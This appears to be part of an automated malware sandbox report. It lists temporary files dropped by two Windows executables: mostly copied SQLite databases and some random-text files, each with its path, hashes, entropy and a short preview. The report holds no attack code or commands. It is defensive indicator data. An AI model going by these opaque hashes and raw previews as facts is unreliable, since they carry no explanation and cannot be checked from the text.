                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp5338.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.6998645060098685
                      Encrypted:false
                      SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                      MD5:1676F91570425F6566A5746BC8E8427E
                      SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                      SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                      SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                      Malicious:false
                      Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                      C:\Users\user\AppData\Local\Temp\tmp5339.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.698473196318807
                      Encrypted:false
                      SSDEEP:24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
                      MD5:4D0D308F391353530363283961DF2C54
                      SHA1:59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
                      SHA-256:6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
                      SHA-512:DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
                      Malicious:false
                      Preview:SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

                      C:\Users\user\AppData\Local\Temp\tmp534A.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.690299109915258
                      Encrypted:false
                      SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                      MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                      SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                      SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                      SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                      Malicious:false
                      Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

                      C:\Users\user\AppData\Local\Temp\tmp534B.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.6998645060098685
                      Encrypted:false
                      SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                      MD5:1676F91570425F6566A5746BC8E8427E
                      SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                      SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                      SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                      Malicious:false
                      Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                      C:\Users\user\AppData\Local\Temp\tmp534C.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.698473196318807
                      Encrypted:false
                      SSDEEP:24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
                      MD5:4D0D308F391353530363283961DF2C54
                      SHA1:59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
                      SHA-256:6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
                      SHA-512:DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
                      Malicious:false
                      Preview:SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

                      C:\Users\user\AppData\Local\Temp\tmp6D9D.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp6D9E.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp6DAE.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp6DBF.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp6DCF.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp6DE0.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp6DF1.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp6DF2.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp6E02.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp7E21.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp7E32.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp7E42.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp7E53.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp7E54.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
